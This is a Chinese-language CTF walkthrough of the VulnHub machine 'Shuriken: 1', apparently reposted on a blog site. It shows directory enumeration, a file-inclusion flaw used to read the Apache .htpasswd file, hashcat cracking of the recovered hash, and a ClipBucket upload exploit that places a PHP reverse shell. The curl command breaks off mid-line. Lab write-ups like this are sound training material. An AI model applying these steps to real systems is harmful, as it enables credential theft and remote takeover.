Shuriken: 1
vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/
0x01 信息收集到获取shell
服务器只开放了80端口,dirb爬取目录。
==> DIRECTORY: http://192.168.56.121/css/
==> DIRECTORY: http://192.168.56.121/img/
+ http://192.168.56.121/index.php (CODE:200|SIZE:6021)
==> DIRECTORY: http://192.168.56.121/js/
==> DIRECTORY: http://192.168.56.121/secret/
最初以为secret目录下secret.png图片做了信息隐藏,一顿操作没有找到任何信息。反过来查看index.php页面的js,发现了有意思的东西。
![Shuriken: 1 vulnhub walkthrough[通俗易懂]插图1 hint](https://img.bianchenghao.cn/app/bianchenghao_cn/53731011a07f4aa88de8e65f54bddb3e.jpg)
hosts后访问http://broadcast.shuriken.local,发现需要basic auth。
![Shuriken: 1 vulnhub walkthrough[通俗易懂]插图3 basic](https://img.bianchenghao.cn/app/bianchenghao_cn/b46a421d5659427881524b22d5a77259.jpg)
http://shuriken.local/index.php?referer=,读取到了apache2的默认配置文件/etc/apache2/sites-enabled/000-default.conf。
继续读/etc/apach2/.htpasswd,得到了用户名和加密密码developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0。
用hashcat结合rockyou字典激活成功教程密码为9972761drmfsls。
kali@kali:~$ hashcat -m 1600 -a 0 1.txt /usr/share/wordlists/rockyou.txt --show
$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0:9972761drmfsls
进入系统,发现是clipbucket4.0。
在exploit-db上搜到一个利用:https://www.exploit-db.com/exploits/44250,成功上传shell。
kali@kali:~$ curl --basic --user "developers:9972761drmfsls" -F "file=@php_reverse_shell.php" -F "plupload=1" -F
今天的文章Shuriken: 1 vulnhub walkthrough[通俗易懂]分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/71530.html
![Shuriken: 1 vulnhub walkthrough[通俗易懂]插图5 auth](https://img.bianchenghao.cn/app/bianchenghao_cn/68b8ea8755754dafb352299335261381.jpg)
![Shuriken: 1 vulnhub walkthrough[通俗易懂]插图7 clibucket](https://img.bianchenghao.cn/app/bianchenghao_cn/7882360acdcc4f889482480945716f48.jpg)